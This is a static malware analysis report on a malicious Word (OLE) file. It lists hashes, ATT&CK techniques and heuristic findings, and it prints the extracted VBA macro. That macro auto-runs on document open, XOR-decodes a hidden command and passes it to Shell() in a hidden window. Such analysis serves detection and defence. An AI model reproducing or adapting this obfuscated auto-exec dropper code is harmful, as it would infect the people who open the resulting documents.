Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 61ae279c6ec24582…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 492.5 KB
Created: 2018-01-26 11:59:00
Authoring application: Microsoft Office Word
First seen: 2018-02-07

MD5: ca0583864570b67f6480bb3078bb1d7a
SHA-1: 55f3c5532248648cf205813142f856049e75e821
SHA-256: 61ae279c6ec245824d229bace8c4847c9f02f47f3d2191e566bce0aac025ebc0

Risk Score: 162

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1203 Exploitation for Client Execution

The sample contains a VBA macro that runs automatically when the document is opened (Document_Open). The macro calls Shell() to execute a command that it deobfuscates at runtime, which likely launches a second-stage payload. The command is reconstructed by XORing an array of integers against a key derived from a document variable; the resulting string is passed to Shell(), starting an external process.

Heuristics (5)

  • VBA macros detected [medium] (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs (channel for all three: in document text, OLE body):
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/tiff/1.0/
    • http://schemas.openxmlformats.org/drawingml/2006/main

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  1565 bytes
SHA-256: a1df33e2d30340f4a7ad994ed32978428d056d2e8b39d699f15a6cb71848a1f4

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If ActiveDocument.Variables("wYmdIG").Value <> "toto" Then
DdvoqmBPRv
ActiveDocument.Variables("wYmdIG").Value = "toto"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub


Attribute VB_Name = "XKXSCiJ"
Private Function TTodQNRDxC(FCYyMCLAff As Variant, UwaDuZjwQY As Integer)
Dim TszWehbFFL, EaDLfqaOZz As String, mRkCLAVTkW, zPpIPKCPru
EaDLfqaOZz = ActiveDocument.Variables("wYmdIG").Value()
TszWehbFFL = ""
mRkCLAVTkW = 1
While mRkCLAVTkW < UBound(FCYyMCLAff) + 2
zPpIPKCPru = mRkCLAVTkW Mod Len(EaDLfqaOZz): If zPpIPKCPru = 0 Then zPpIPKCPru = Len(EaDLfqaOZz)
TszWehbFFL = TszWehbFFL + Chr(Asc(Mid(EaDLfqaOZz, zPpIPKCPru + UwaDuZjwQY, 1)) Xor CInt(FCYyMCLAff(mRkCLAVTkW - 1)))
mRkCLAVTkW = mRkCLAVTkW + 1
Wend
TTodQNRDxC = TszWehbFFL
End Function
Public Function DdvoqmBPRv() As Variant
Dim JXv As String
JXv = TTodQNRDxC(Array(4, 79, 55, 56, 36, 43, 80, 37, 38, 33, 11, 38, 1, 57, 62, 50, 44, 88, 84, 57, 30, _
74, 47, 28, 83, 104, 28, 60, 80, 74, 38, 71, 58, 34, 9, 108, 74, 90, 3, 58, 70, _
28, 30, 24, 28, 61, 28, 59, 29, 56, 8, 18, 66, 15, 37, 91, 17, 38, 18, 18, 94, _
3, 63, 53, 106, 4, 80, 80, 90, 90, 61, 27, 54, 5, 23), 0)
Dim RetVal
RetVal = Shell(JXv, 0)
End Function